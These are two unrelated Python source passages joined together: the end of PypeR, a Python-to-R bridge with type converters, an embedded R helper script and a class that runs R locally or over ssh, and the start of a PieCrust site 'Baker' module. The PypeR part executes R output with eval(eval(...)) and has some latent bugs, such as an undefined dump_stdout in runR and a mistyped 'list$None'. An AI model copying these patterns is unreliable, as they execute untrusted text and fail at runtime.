rv = _mystr(p.StandardOutput.ReadLine()) + '\n' # add newline since ReadLine removed it.
if dump_stdout:
sys.stdout.write(rv)
sys.stdout.flush()
return(rv)
else:
try:
import subprocess
_has_subp = True
Popen, PIPE, _STDOUT = subprocess.Popen, subprocess.PIPE, subprocess.STDOUT
except: # Python 2.3 or older
PIPE, _STDOUT = None, None
def Popen(CMD, *a, **b):
class A:
None
p = A()
p.stdin, p.stdout = os.popen4(' '.join(CMD))
return(p)
def sendAll(p, s):
p.stdin.write(_mybytes(s))
#os.write(p.stdin.fileno(), s)
p.stdin.flush()
def readLine(p, dump_stdout=False, *a, **b):
rv = _mystr(p.stdout.readline())
if dump_stdout:
sys.stdout.write(rv)
sys.stdout.flush()
return(rv)
def NoneStr(obj): return('NULL')
def BoolStr(obj):
return(obj and 'TRUE' or 'FALSE')
def ReprStr(obj):
return(repr(obj))
if has_numpy:
def FloatStr(f):
if f is numpy.NaN or f is numpy.nan:
return('NaN') # or 'NA'
if has_pandas and pandas.isnull(f):
return('NaN')
if numpy.isposinf(f):
return('Inf')
if numpy.isneginf(f):
return('-Inf')
return(repr(f))
else:
FloatStr = repr
def LongStr(obj):
rv = repr(obj)
if rv[-1] == 'L':
rv = rv[:-1]
return(rv)
def ComplexStr(obj):
return(repr(obj).replace('j', 'i'))
def UniStr(obj):
return(repr(obj.encode('utf8')))
def ByteStr(obj):
return(repr(obj)[1:])
#return obj.decode()
def SeqStr(obj, head='c(', tail=')', enclose=True):
if not enclose: # don't add head and tail
return(','.join(map(Str4R, obj)))
if not obj:
return(head + tail)
# detect types
if isinstance(obj, set):
obj = list(obj)
obj0 = obj[0]
tp0 = type(obj0)
simple_types = [str, bool, int, long, float, complex]
num_types = [int, long, float, complex]
is_int = tp0 in (int, long) # token for explicit converstion to integer in R since R treat an integer from stdin as double
if tp0 not in simple_types:
head = 'list('
else:
tps = isinstance(obj0, basestring) and [StringType] or isinstance(obj0, bool) and [BooleanType] or num_types
for i in obj[1:]:
tp = type(i)
if tp not in tps:
head = 'list('
is_int = False
break
elif is_int and tp not in (int, long):
is_int = False
# convert
return((is_int and 'as.integer(' or '') + head + ','.join(map(Str4R, obj)) + tail + (is_int and ')' or ''))
def DictStr(obj):
return('list(' + ','.join(['%s=%s' % (Str4R(a[0]), Str4R(a[1])) for a in obj.items()]) + ')')
# 'b':boolean, 'i':integer, 'u':unsigned int, 'f':float, c complex-float
# 'S'/'a':string, 'U':unicode, 'V':raw data. 'O':string?
_tpdic = {'i':'as.integer(c(%s))', 'u':'as.integer(c(%s))', 'f':'as.double(c(%s))', 'c':'as.complex(c(%s))',
'b':'c(%s)', 'S':'c(%s)', 'a':'c(%s)', 'U':'c(%s)', 'V':'list(%s)', 'O':'as.character(c(%s))'}
def getVec(ary):
# used for objects from numpy and pandas
tp = ary.dtype.kind
if len(ary.shape) > 1:
ary = ary.reshape(reduce(lambda a,b=1: a*b, ary.shape))
ary = ary.tolist()
if tp != 'V':
return(_tpdic.get(tp, 'c(%s)') % SeqStr(ary, enclose=False))
# record array
ary = list(map(SeqStr, ary)) # each record will be mapped to vector or list
return(_tpdic.get(tp, 'list(%s)') % (', '.join(ary))) # use str here instead of repr since it has already been converted to str by SeqStr
def NumpyNdarrayStr(obj):
shp = obj.shape
if len(shp) == 1: # to vector
tp = obj.dtype
if tp.kind != 'V':
return(getVec(obj))
# One-dimension record array will be converted to data.frame
def mapField(f):
ary = obj[f]
tp = ary.dtype.kind
return('"%s"=%s' % (f, _tpdic.get(tp, 'list(%s)') % SeqStr(ary.tolist(), enclose=False)))
return('data.frame(%s)' % (', '.join(map(mapField, tp.names))))
elif len(shp) == 2: # two-dimenstion array will be converted to matrix
return('matrix(%s, nrow=%d, byrow=TRUE)' % (getVec(obj), shp[0]))
else: # to array
dim = list(shp[-2:]) # row, col
dim.extend(shp[-3::-1])
newaxis = list(range(len(shp)))
newaxis[-2:] = [len(shp)-1, len(shp)-2]
return('array(%s, dim=c(%s))' % (getVec(obj.transpose(newaxis)), repr(dim)[1:-1]))
def PandasSerieStr(obj):
return('data.frame(%s=%s, row.names=%s)' % (obj.name, getVec(obj.values), getVec(obj.index)))
def PandasDataFrameStr(obj):
# DataFrame will be converted to data.frame, have to explicitly name columns
#return 'data.frame(%s, row.names=%s)' % (', '.join(map(lambda a,b=obj:a+'='+getVec(obj[a]), obj)), getVec(obj.index))
s = ', '.join(map(lambda a,b=obj: '"%s"=%s' % (str(a), getVec(obj[a])), obj))
return('data.frame(%srow.names=%s)' % (s and s+', ', getVec(obj.index)))
s = ''
for col in obj:
s = s + col + '=' + getVec(obj[col]) + ', '
# print 'data.frame(%s row.names=%s)' % (s, getVec(obj.index))
return('data.frame(%s row.names=%s)' % (s, getVec(obj.index)))
def OtherStr(obj):
if hasattr(obj, '__iter__'): # for iterators
if hasattr(obj, '__len__') and len(obj) <= 10000:
return(SeqStr(list(obj)))
else: # waiting for better solution for huge-size containers
return(SeqStr(list(obj)))
return(repr(obj))
str_func = {type(None): NoneStr, bool: BoolStr, long: LongStr, int: repr, float: FloatStr, complex: ComplexStr,
unicode: UniStr, str: repr, list: SeqStr, tuple: SeqStr, set: SeqStr, frozenset: SeqStr, dict: DictStr} # str will override uncode in Python 3
base_tps = [type(None), bool, int, long, float, complex, str, unicode, list, tuple, set, frozenset, dict] # use type(None) instead of NoneType since the latter cannot be found in the types module in Python 3
if has_numpy:
str_func[numpy.ndarray] = NumpyNdarrayStr
base_tps.append(numpy.ndarray)
if has_pandas:
str_func.update({pandas.Series: PandasSerieStr, pandas.DataFrame: PandasDataFrameStr})
base_tps.extend([pandas.Series, pandas.DataFrame])
base_tps.reverse()
if _in_py3:
base_tps.append(bytes)
str_func[bytes] = ByteStr
def Str4R(obj):
'''
convert a Python basic object into an R object in the form of string.
'''
#return str_func.get(type(obj), OtherStr)(obj)
# for objects known by PypeR
if type(obj) in str_func:
return(str_func[type(obj)](obj))
# for objects derived from basic data types
for tp in base_tps:
if isinstance(obj, tp):
return(str_func[tp](obj))
# for any other objects
return(OtherStr(obj))
class RError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return(repr(self.value))
class R(object): # "del r.XXX" fails on FePy-r7 (IronPython 1.1 on .NET 2.0.50727.42) if using old-style class
'''
A Python class to enclose an R process.
'''
__Rfun = r'''.getRvalue4Python__ <- function(x, use_dict=NULL, has_numpy=FALSE, has_pandas=FALSE) {
if (has_pandas) has_numpy <- TRUE
if (has_numpy) {
headstr <- 'numpy.array('
tailstr <- ')' }
else headstr <- tailstr <- ''
SpecialLocs <- function(x) { # find locations of special values: NULL, NA, NaN, Inf
rlt <- list()
if (!has_numpy) {
idx <- which(is.null(x) | is.na(x) | is.nan(x) | is.infinite(x))
if (length(idx) > 0) list$None <- idx
}
else {
idx <- which(is.null(x) | is.na(x))
if (length(idx) > 0) rlt$None <- idx
idx <- which(is.nan(x))
if (length(idx) > 0) rlt$numpy.NaN <- idx
idx <- which(is.infinite(x))
if (length(idx) > 0) {
v <- x[idx]
iidx <- which(v > 0)
if (length(iidx) > 0) rlt$numpy.Inf <- idx[iidx]
iidx <- which(v < 0)
if (length(iidx) > 0) rlt['-numpy.Inf'] <- idx[iidx]
}
}
return(rlt)
}
SpecialVals <- function(x, valoc) {
for (val in names(valoc)) x[valoc[[val]]] <- val
return(x)
}
NullStr <- function(x) 'None'
VectorStr <- function(x) {
#nms <- names(x)
#if (!is.null(nms) && length(nms)>0) return(ListStr(as.list(x)))
complx <- is.complex(x)
special_locs <- SpecialLocs(x)
if (is.character(x)) {
x <- gsub('\\\\', '\\\\\\\\', x)
x <- gsub('"', '\\\\"', x)
x <- paste('"', x, '"', sep='') }
else if (is.logical(x)) x <- ifelse(x, 'True', 'False')
if (length(special_locs) > 0) x <- SpecialVals(x, special_locs)
if (length(x)==1) x <- paste(x) # convert to character using paste, "gettext", or "as.character"
else x <- paste(headstr, '[', paste(x, collapse=','), ']', tailstr, sep='')
if (complx) x <- gsub('i', 'j', x)
return(x) }
MatrixStr <- function(x) {
complx <- is.complex(x)
special_locs <- SpecialLocs(x)
if (is.character(x)) x <- matrix(paste('"', x, '"', sep=''), nrow=nrow(x))
else if (is.logical(x)) x <- ifelse(x, 'True', 'False')
if (length(special_locs) > 0) x <- SpecialVals(x, special_locs)
x <- apply(x, 1, function(r) paste('[', paste(r, collapse=','), ']', sep=''))
x <- paste(headstr, '[', paste(x, collapse=','), ']', tailstr, sep='')
if (complx) x <- gsub('i', 'j', x)
return(x) }
ArrayStr <- function(x) {
complx <- is.complex(x)
ndim <- length(dim(x))
if (ndim == 1) return(VectorStr(x))
if (ndim == 2) return(MatrixStr(x))
# ndim >= 3
if (is.character(x)) x <- array(paste('"', x, '"', sep=''), dim=dim(x))
else if (is.logical(x)) x <- ifelse(x, 'True', 'False')
# do col first
x <- apply(x, seq(dim(x))[-2], function(r) paste('[', paste(r, collapse=','), ']', sep=''))
for (i in seq(ndim-2))
x <- apply(x, seq(dim(x))[-1], function(r) paste('[', paste(r, collapse=','), ']', sep=''))
x <- paste(headstr, '[', paste(x, collapse=','), ']', tailstr, sep='')
if (complx) x <- gsub('i', 'j', x)
return(x) }
DataFrameStr <- function(x) {
if (ncol(x) == 0) {
if (has_pandas) return('pandas.DataFrame()')
if (has_numpy) return('numpy.array([])')
return('[]')}
if (has_numpy) {
cnms <- colnames(x) # get column names
ctp <- list()
for (i in seq(x)) {
xi <- as.vector(x[[i]])
special_locs <- SpecialLocs(xi)
if (is.character(xi)) {
ctp[i] <- sprintf('("%s", "|S%d")', cnms[i], if (length(xi) > 0) max(nchar(xi)) else 0 )
xi <- paste('"', xi, '"', sep='') }
else if (is.logical(xi)) {
xi <- ifelse(xi, 'True', 'False')
ctp[i] <- paste('("', cnms[i], '", "<?")' ) }
else if (is.integer(xi)) {
xi <- paste(xi)
ctp[i] <- paste('("', cnms[i], '", "<q")' ) }
else if (is.double(xi)) {
xi <- paste(xi)
ctp[i] <- paste('("', cnms[i], '", "<g")' ) }
else if (is.complex(xi)) {
xi <- gsub('i', 'j', paste(xi))
ctp[i] <- paste('("', cnms[i], '", "<G")') }
if (length(special_locs) > 0) xi <- SpecialVals(xi, special_locs)
if (nrow(x) > 0) x[[i]] <- xi }
tailstr <- paste(', dtype=[', paste(ctp, collapse=','), ']', tailstr, sep='') }
else if (nrow(x) > 0)
for (i in seq(x)) {
xi <- as.vector(x[[i]])
special_locs <- SpecialLocs(xi)
if (is.character(xi)) xi <- paste('"', xi, '"', sep='')
else if (is.logical(xi)) xi <- ifelse(xi, 'True', 'False')
else if (is.integer(xi)) xi <- paste(xi)
else if (is.double(xi)) xi <- paste(xi)
else if (is.complex(xi)) xi <- gsub('i', 'j', paste(xi))
if (length(special_locs) > 0) xi <- SpecialVals(xi, special_locs)
if (nrow(x) > 0) x[[i]] <- xi }
x <- as.matrix(x)
x <- apply(x, 1, function(r) paste('(', paste(r, collapse=','), if(length(r)<2) ',)' else ')', sep=''))
x <- paste(headstr, '[', paste(x, collapse=','), ']', tailstr, sep='')
if (has_pandas) x <- paste('pandas.DataFrame(', x, ')', sep='')
return(x) }
ListStr <- function(x) {
nms <- names(x) # get column names
x <- sapply(x, Str4Py)
return(zipVecWithName(x, nms))}
zipVecWithName <- function(x, nms) {
if (!is.null(nms) && length(nms)>0) {
nms <- paste('"', nms, '"', sep='')
x <- sapply(seq(nms), function(i) paste('(', nms[i], ',', x[i], ')') )
if (identical(use_dict, TRUE)) x <- paste('dict([', paste(x, collapse=','), '])', sep='')
else if (identical(use_dict, FALSE)) x <- paste('[', paste(x, collapse=','), ']', sep='')
else { # should be NULL or something else
if (any(duplicated(nms))) x <- paste('[', paste(x, collapse=','), ']', sep='')
else x <- paste('dict([', paste(x, collapse=','), '])', sep='') } }
else x <- paste('[', paste(x, collapse=','), ']', sep='')
return(x) }
Str4Py <- function(x) {
# no considering on NA, Inf, ...
# use is.XXX, typeof, class, mode, storage.mode, sprintf
if (is.factor(x)) x <- as.vector(x)
rlt <- {
if (is.null(x)) NullStr(x)
else if (is.vector(x) && !is.list(x)) VectorStr(x)
else if (is.matrix(x) || is.array(x)) ArrayStr(x)
else if (is.data.frame(x)) DataFrameStr(x)
else if (is.list(x)) ListStr(x)
else Str4Py(as.character(x)) } # other objects will be convert to character (instead of NullStr), or use "gettext"
return(rlt) }
Str4Py(x) }
# initalize library path for TCL/TK based environment on Windows, e.g. Python IDLE
.addLibs <- function() {
ruser <- Sys.getenv('R_USER')
userpath <- Sys.getenv('R_LIBS_USER')
libpaths <- .libPaths()
for (apath in userpath) {
if (length(grep(apath, libpaths)) > 0) next
if (file.exists(apath)) .libPaths(apath)
else {
d <- '/Documents'
if (substr(ruser, nchar(ruser)-nchar(d)+1, nchar(ruser)) != d) {
apath <- paste(ruser,d, substr(apath, nchar(ruser)+1, nchar(apath)), sep='')
if (file.exists(apath)) .libPaths(apath)} } } }
if(identical(.Platform$OS.type, 'windows')) .addLibs()
rm(.addLibs)
'''
_DEBUG_MODE = True
def __init__(self, RCMD='R', max_len=1000, use_numpy=True, use_pandas=True, use_dict=None,
host='localhost', user=None, ssh='ssh', return_err=True, dump_stdout=False):
'''
RCMD: The name of a R interpreter, path information should be included
if it is not in the system search path.
use_numpy: Used as a boolean value. A False value will disable numpy
even if it has been imported.
use_pandas: Used as a boolean value. A False value will disable pandas
even if it has been imported.
use_dict: A R named list will be returned as a Python dictionary if
"use_dict" is True, or a list of tuples (name, value) if "use_dict"
is False. If "use_dict" is None, the return value will be a
dictionary if there is no replicated names, or a list if replicated
names found.
host: The computer name (or IP) on which the R interpreter is
installed. The value "localhost" means that R locates on the the
localhost computer. On POSIX systems (including Cygwin environment
on Windows), it is possible to use R on a remote computer if the
command "ssh" works. To do that, the user needs to set this value,
and perhaps the parameter "user".
user: The user name on the remote computer. This value needs to be set
only if the user name on the remote computer is different from the
local user. In interactive environment, the password can be input
by the user if prompted. If running in a program, the user needs to
be able to login without typing password!
ssh: The program to login to remote computer.
return_err: redirect stderr to stdout
dump_stdout:
prints output from R directly to sys.stdout, useful for long running
routines which print progress during execution.
'''
# use self.__dict__.update to register variables since __setattr__ is
# used to set variables for R. tried to define __setattr in the class,
# and change it to __setattr__ for instances at the end of __init__,
# but it seems failed.
# -- maybe this only failed in Python2.5? as warned at
# http://wiki.python.org/moin/NewClassVsClassicClass:
# "Warning: In 2.5, magic names (typically those with a double
# underscore (DunderAlias) at both ends of the name) may look at the
# class rather than the instance even for old-style classes."
self.__dict__.update({'prog': None,
'has_numpy': use_numpy and has_numpy,
'has_pandas': use_pandas and has_pandas,
'Rfun': self.__class__.__Rfun,
'max_len': max_len,
'use_dict': use_dict,
'dump_stdout': dump_stdout,
'localhost': host == 'localhost',
'newline': sys.platform == 'win32' and '\r\n' or '\n',
'sendAll' : sendAll # keep a reference to the global function "sendAll" which will be used by __del__
})
RCMD = [RCMD] #shlex.split(RCMD) - shlex do not work properly on Windows! #re.split(r'\s', RCMD)
if not self.localhost:
RCMD.insert(0, host)
if user:
RCMD.insert(0, '-l%s' % user)
RCMD.insert(0, ssh)
# args = ('--vanilla',) # equal to --no-save, --no-restore, --no-site-file, --no-init-file and --no-environ
args = ('--quiet', '--no-save', '--no-restore') # "--slave" cannot be used on Windows!
for arg in args:
if arg not in RCMD:
RCMD.append(arg)
if _has_subp and hasattr(subprocess, 'STARTUPINFO'):
info = subprocess.STARTUPINFO()
try:
if hasattr(subprocess, '_subprocess'):
info.dwFlags |= subprocess._subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = subprocess._subprocess.SW_HIDE
else:
info.dwFlags |= subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = subprocess.SW_HIDE
except:
info = None
else:
info = None
# create stderr to replace None for py2exe:
# http://www.py2exe.org/index.cgi/Py2ExeSubprocessInteractions
if sys.platform != 'win32':
childstderr = None
else:
if hasattr(sys.stderr, 'fileno'):
childstderr = sys.stderr
elif hasattr(sys.stderr, '_file') and hasattr(sys.stderr._file, 'fileno'):
childstderr = sys.stderr._file
else: # Give up and point child stderr at nul
childstderr = file('nul', 'a')
self.__dict__['prog'] = Popen(RCMD, stdin=PIPE, stdout=PIPE, stderr=return_err and _STDOUT or childstderr, startupinfo=info)
self.__call__(self.Rfun)
def __runOnce(self, CMD, use_try=None):
'''
CMD: a R command string
'''
use_try = use_try or self._DEBUG_MODE
newline = self.newline
tail_token = 'R command at time: %s' % repr(time.time())
# tail_token_r = re.sub(r'[\(\)\.]', r'\\\1', tail_token)
tail_cmd = 'print("%s")%s' % (tail_token, newline)
tail_token = tail_token.replace(' ', '\\s').replace('.', '\\.').replace('+', '\\+')
re_tail = re.compile(r'>\sprint\("%s"\)\r?\n\[1\]\s"%s"\r?\n$' % (tail_token, tail_token))
if len(CMD) <= self.max_len or not self.localhost:
fn = None
CMD = (use_try and 'try({%s})%s%s' or '%s%s%s') % (CMD.replace('\\', '\\\\'), newline, tail_cmd)
else:
fh, fn = tempfile.mkstemp()
os.fdopen(fh, 'wb').write(_mybytes(CMD))
if sys.platform == 'cli':
os.close(fh) # this is necessary on IronPython
fn = fn.replace('\\', '/')
CMD = (use_try and 'try({source("%s")})%sfile.remove(%r)%s%s' or '%s%s%s') % (fn, newline, fn, newline, tail_cmd)
self.sendAll(self.prog, CMD)
rlt = ''
while not re_tail.search(rlt):
try:
rltonce = readLine(self.prog, dump_stdout=self.dump_stdout)
if rltonce:
rlt = rlt + rltonce
except:
break
else:
rlt = re_tail.sub('', rlt)
if rlt.startswith('> '):
rlt = rlt[2:]
# if fn is not None: os.unlink(fn)
return(rlt)
def __call__(self, CMDS=[], use_try=None):
'''
Run a (list of) R command(s), and return the output message from the STDOUT of R.
CMDS: an R command string or a list of R commands
'''
rlt = []
if isinstance(CMDS, basestring): # a single command
rlt.append(self.__runOnce(CMDS, use_try=use_try))
else: # should be a list of commands
# for CMD in CMDS:
# rlt.append(self.__runOnce(CMD, use_try=use_try))
rlt.append(self.__runOnce('; '.join(CMDS), use_try=use_try)) # now, ['sink("output.txt")', ..., 'sink()'] is allowed!
if len(rlt) == 1:
rlt = rlt[0]
return(rlt)
def __getitem__(self, obj, use_try=None, use_dict=None): # to model a dict: "r['XXX']"
'''
Get the value of an R variable or expression. The return value is
converted to the corresponding Python object.
obj: a string - the name of an R variable, or an R expression
use_try: use "try" function to wrap the R expression. This can avoid R
crashing if the obj does not exist in R.
use_dict: named list will be returned a dict if use_dict is True,
otherwise it will be a list of tuples (name, value)
'''
if obj.startswith('_'):
raise RError('Leading underscore ("_") is not permitted in R variable names!')
use_try = use_try or self._DEBUG_MODE
if use_dict is None:
use_dict = self.use_dict
cmd = '.getRvalue4Python__(%s, use_dict=%s, has_numpy=%s, has_pandas=%s)' % (obj, use_dict is None and 'NULL' or use_dict and 'TRUE' or 'FALSE', self.has_numpy and 'TRUE' or 'FALSE', self.has_pandas and 'TRUE' or 'FALSE')
rlt = self.__call__(cmd, use_try=use_try)
head = (use_try and 'try({%s})%s[1] ' or '%s%s[1] ') % (cmd, self.newline)
# sometimes (e.g. after "library(fastICA)") the R on Windows uses '\n' instead of '\r\n'
head = rlt.startswith(head) and len(head) or len(head) - 1
tail = rlt.endswith(self.newline) and len(rlt) - len(self.newline) or len(rlt) - len(self.newline) + 1 # - len('"')
try:
rlt = eval(eval(rlt[head:tail])) # The inner eval remove quotes and recover escaped characters.
except:
raise RError(rlt)
return(rlt)
def __setitem__(self, obj, val): # to model a dict: "r['XXX'] = YYY"
'''
Assign a value (val) to an R variable (obj).
obj: a string - the name of an R variable
val: a python object - the value to be passed to an R object
'''
if obj.startswith('_'):
raise RError('Leading underscore ("_") is not permitted in R variable names!')
self.__call__('%s <- %s' % (obj, Str4R(val)))
def __delitem__(self, obj): # to model a dict: "del r['XXX']"
if obj.startswith('_'):
raise RError('Leading underscore ("_") is not permitted in R variable names!')
self.__call__('rm(%s)' % obj)
def __del__(self): # to model "del r"
if self.prog:
try:
self.sendAll(self.prog, 'q("no")'+self.newline)
except:
pass
self.prog = None
def __getattr__(self, obj, use_dict=None): # to model object attribute: "r.XXX"
'''
obj: a string - the name of an R variable
use_dict: named list will be returned a dict if use_dict is True,
otherwise it will be a list of tuples (name, value)
'''
# Overriding __getattr__ is safer than __getattribute__ since it is
# only called as a last resort i.e. if there are no attributes in the
# instance that match the name
if obj in self.__dict__:
return(self.__dict__[obj])
if obj in self.__class__.__dict__:
return(self.__class__.__dict__[obj])
try:
if use_dict is None:
use_dict = self.use_dict
rlt = self.__getitem__(obj, use_dict=use_dict)
except:
raise # RError('No this object!')
return(rlt)
def __setattr__(self, obj, val): # to model object attribute: "r.XXX = YYY"
if obj in self.__dict__ or obj in self.__class__.__dict__: # or obj.startswith('_'):
self.__dict__[obj] = val # for old-style class
#object.__setattr__(self, obj, val) # for new-style class
else:
self.__setitem__(obj, val)
def __delattr__(self, obj): # to model object attribute: "del r.XXX"
if obj in self.__dict__:
del self.__dict__[obj]
else:
self.__delitem__(obj)
def get(self, obj, default=None, use_dict=None): # to model a dict: "r.get('XXX', 'YYY')"
'''
obj: a string - the name of an R variable, or an R expression
default: a python object - the value to be returned if failed to get data from R
use_dict: named list will be returned a dict if use_dict is True,
otherwise it will be a list of tuples (name, value). If use_dict is
None, the value of self.use_dict will be used instead.
'''
try:
rlt = self.__getitem__(obj, use_try=True, use_dict=use_dict)
except:
if True: # val is not None:
rlt = default
else:
raise RError('No this object!')
return(rlt)
run, assign, remove = __call__, __setitem__, __delitem__
# for a single-round duty:
def runR(CMDS, Robj='R', max_len=1000, use_numpy=True, use_pandas=True, use_dict=None, host='localhost', user=None, ssh='ssh'):
'''
Run a (list of) R command(s), and return the output from the STDOUT.
CMDS: a R command string or a list of R commands.
Robj: can be a shell command (like /usr/bin/R), or the R class.
max_len: define the upper limitation for the length of command string. A
command string will be passed to R by a temporary file if it is longer
than this value.
use_numpy: Used as a boolean value. A False value will disable numpy even
if it has been imported.
use_pandas: Used as a boolean value. A False value will disable pandas even
if it has been imported.
use_dict: named list will be returned a dict if use_dict is True, otherwise
it will be a list of tuples (name, value).
host: The computer name (or IP) on which the R interpreter is
installed. The value "localhost" means that the R locates on the
the localhost computer. On POSIX systems (including Cygwin
environment on Windows), it is possible to use R on a remote
computer if the command "ssh" works. To do that, the user need set
this value, and perhaps the parameter "user".
user: The user name on the remote computer. This value need to be set
only if the user name is different on the remote computer. In
interactive environment, the password can be input by the user if
prompted. If running in a program, the user need to be able to
login without typing password!
ssh: The program to login to remote computer.
'''
if isinstance(Robj, basestring):
Robj = R(RCMD=Robj, max_len=max_len, use_numpy=use_numpy, use_pandas=use_pandas, use_dict=use_dict, host=host, user=user, ssh=ssh, dump_stdout=dump_stdout)
rlt = Robj.run(CMDS=CMDS)
if len(rlt) == 1:
rlt = rlt[0]
return(rlt)
|
<gh_stars>10-100
import time
import os.path
import hashlib
import logging
from piecrust.chefutil import (
format_timed_scope, format_timed)
from piecrust.environment import ExecutionStats
from piecrust.pipelines.base import (
PipelineJobCreateContext, PipelineJobResultHandleContext, PipelineManager,
get_pipeline_name_for_source)
from piecrust.pipelines.records import (
MultiRecordHistory, MultiRecord,
load_records)
from piecrust.sources.base import REALM_USER, REALM_THEME, REALM_NAMES
logger = logging.getLogger(__name__)
def get_bake_records_path(app, out_dir, *, suffix=''):
records_cache = app.cache.getCache('baker')
records_id = hashlib.md5(out_dir.encode('utf8')).hexdigest()
records_name = '%s%s.records' % (records_id, suffix)
return records_cache.getCachePath(records_name)
class Baker(object):
def __init__(self, appfactory, app, out_dir, *,
force=False,
allowed_pipelines=None,
forbidden_pipelines=None,
allowed_sources=None,
rotate_bake_records=True,
keep_unused_records=False):
self.appfactory = appfactory
self.app = app
self.out_dir = out_dir
self.force = force
self.allowed_pipelines = allowed_pipelines
self.forbidden_pipelines = forbidden_pipelines
self.allowed_sources = allowed_sources
self.rotate_bake_records = rotate_bake_records
self.keep_unused_records = keep_unused_records
def bake(self):
start_time = time.perf_counter()
# Setup baker.
logger.debug(" Bake Output: %s" % self.out_dir)
logger.debug(" Root URL: %s" % self.app.config.get('site/root'))
# Get into bake mode.
self.app.config.set('baker/is_baking', True)
self.app.config.set('site/asset_url_format', '%page_uri%/%filename%')
stats = self.app.env.stats
stats.registerTimer('LoadSourceContents', raise_if_registered=False)
stats.registerTimer('CacheTemplates', raise_if_registered=False)
# Make sure the output directory exists.
if not os.path.isdir(self.out_dir):
os.makedirs(self.out_dir, 0o755)
# Load/create the bake records.
records_path = get_bake_records_path(
self.app, self.out_dir)
if not self.force and os.path.isfile(records_path):
with format_timed_scope(logger, "loaded previous bake records",
level=logging.DEBUG, colored=False):
previous_records = load_records(records_path)
else:
previous_records = MultiRecord()
current_records = MultiRecord()
# Figure out if we need to clean the cache because important things
# have changed.
is_cache_valid = self._handleCacheValidity(previous_records,
current_records)
if not is_cache_valid:
previous_records = MultiRecord()
# Create the bake records history which tracks what's up-to-date
# or not since last time we baked to the given output folder.
record_histories = MultiRecordHistory(
previous_records, current_records)
# Pre-create all caches.
for cache_name in ['app', 'baker', 'pages', 'renders']:
self.app.cache.getCache(cache_name)
# Create the pipelines.
ppmngr = self._createPipelineManager(record_histories)
# Done with all the setup, let's start the actual work.
logger.info(format_timed(start_time, "setup baker"))
# Load all sources, pre-cache templates.
load_start_time = time.perf_counter()
self._populateTemplateCaches()
logger.info(format_timed(load_start_time, "cache templates"))
# Create the worker processes.
pool_userdata = _PoolUserData(self, ppmngr)
pool = self._createWorkerPool(records_path, pool_userdata)
# Bake the realms.
self._bakeRealms(pool, ppmngr, record_histories)
# Handle deletions, collapse records, etc.
ppmngr.postJobRun()
ppmngr.deleteStaleOutputs()
ppmngr.collapseRecords(self.keep_unused_records)
# All done with the workers. Close the pool and get reports.
pool_stats = pool.close()
current_records.stats = _merge_execution_stats(stats, *pool_stats)
# Shutdown the pipelines.
ppmngr.shutdownPipelines()
# Backup previous records, save the current ones.
current_records.bake_time = time.time()
current_records.out_dir = self.out_dir
_save_bake_records(current_records, records_path,
rotate_previous=self.rotate_bake_records)
# All done.
self.app.config.set('baker/is_baking', False)
logger.debug(format_timed(start_time, 'done baking'))
return current_records
def _handleCacheValidity(self, previous_records, current_records):
start_time = time.perf_counter()
reason = None
if self.force:
reason = "ordered to"
elif not self.app.config.get('__cache_valid'):
# The configuration file was changed, or we're running a new
# version of the app.
reason = "not valid anymore"
elif previous_records.invalidated:
# We have no valid previous bake records.
reason = "need bake records regeneration"
else:
# Check if any template has changed since the last bake. Since
# there could be some advanced conditional logic going on, we'd
# better just force a bake from scratch if that's the case.
max_time = 0
for d in self.app.templates_dirs:
for dpath, _, filenames in os.walk(d):
for fn in filenames:
full_fn = os.path.join(dpath, fn)
max_time = max(max_time, os.path.getmtime(full_fn))
if max_time >= previous_records.bake_time:
reason = "templates modified"
if reason is not None:
# We have to bake everything from scratch.
self.app.cache.clearCaches(except_names=['app', 'baker'])
self.force = True
current_records.incremental_count = 0
previous_records = MultiRecord()
logger.debug(format_timed(
start_time, "cleaned cache (reason: %s)" % reason,
colored=False))
return False
else:
current_records.incremental_count += 1
logger.debug(format_timed(
start_time, "cache is assumed valid", colored=False))
return True
def _createPipelineManager(self, record_histories):
# Gather all sources by realm -- we're going to bake each realm
# separately so we can handle "overriding" (i.e. one realm overrides
# another realm's pages, like the user realm overriding the theme
# realm).
#
# Also, create and initialize each pipeline for each source.
has_any_pp = False
ppmngr = PipelineManager(
self.app, self.out_dir,
record_histories=record_histories)
ok_pp = self.allowed_pipelines
nok_pp = self.forbidden_pipelines
ok_src = self.allowed_sources
for source in self.app.sources:
if ok_src is not None and source.name not in ok_src:
continue
pname = get_pipeline_name_for_source(source)
if ok_pp is not None and pname not in ok_pp:
continue
if nok_pp is not None and pname in nok_pp:
continue
ppinfo = ppmngr.createPipeline(source)
logger.debug(
"Created pipeline '%s' for source: %s" %
(ppinfo.pipeline.PIPELINE_NAME, source.name))
has_any_pp = True
if not has_any_pp:
raise Exception("The website has no content sources, or the bake "
"command was invoked with all pipelines filtered "
"out. There's nothing to do.")
return ppmngr
def _populateTemplateCaches(self):
engine_name = self.app.config.get('site/default_template_engine')
for engine in self.app.plugin_loader.getTemplateEngines():
if engine_name in engine.ENGINE_NAMES:
engine.populateCache()
break
def _bakeRealms(self, pool, ppmngr, record_histories):
# Bake the realms -- user first, theme second, so that a user item
# can override a theme item.
# Do this for as many times as we have pipeline passes left to do.
realm_list = [REALM_USER, REALM_THEME]
pp_by_pass_and_realm = _get_pipeline_infos_by_pass_and_realm(
ppmngr.getPipelineInfos())
for pp_pass_num in sorted(pp_by_pass_and_realm.keys()):
logger.debug("Pipelines pass %d" % pp_pass_num)
pp_by_realm = pp_by_pass_and_realm[pp_pass_num]
for realm in realm_list:
pplist = pp_by_realm.get(realm)
if pplist is not None:
self._bakeRealm(pool, ppmngr, record_histories,
pp_pass_num, realm, pplist)
def _bakeRealm(self, pool, ppmngr, record_histories,
pp_pass_num, realm, pplist):
start_time = time.perf_counter()
job_count = 0
job_descs = {}
realm_name = REALM_NAMES[realm].lower()
pool.userdata.cur_pass = pp_pass_num
for ppinfo in pplist:
src = ppinfo.source
pp = ppinfo.pipeline
jcctx = PipelineJobCreateContext(pp_pass_num, pp.record_name,
record_histories)
jobs, job_desc = pp.createJobs(jcctx)
if jobs is not None:
new_job_count = len(jobs)
job_count += new_job_count
pool.queueJobs(jobs)
if job_desc:
job_descs.setdefault(job_desc, []).append(src.name)
else:
new_job_count = 0
logger.debug(
"Queued %d jobs for source '%s' using pipeline '%s' "
"(%s)." %
(new_job_count, src.name, pp.PIPELINE_NAME, realm_name))
if job_count == 0:
logger.debug("No jobs queued! Bailing out of this bake pass.")
return
pool.wait()
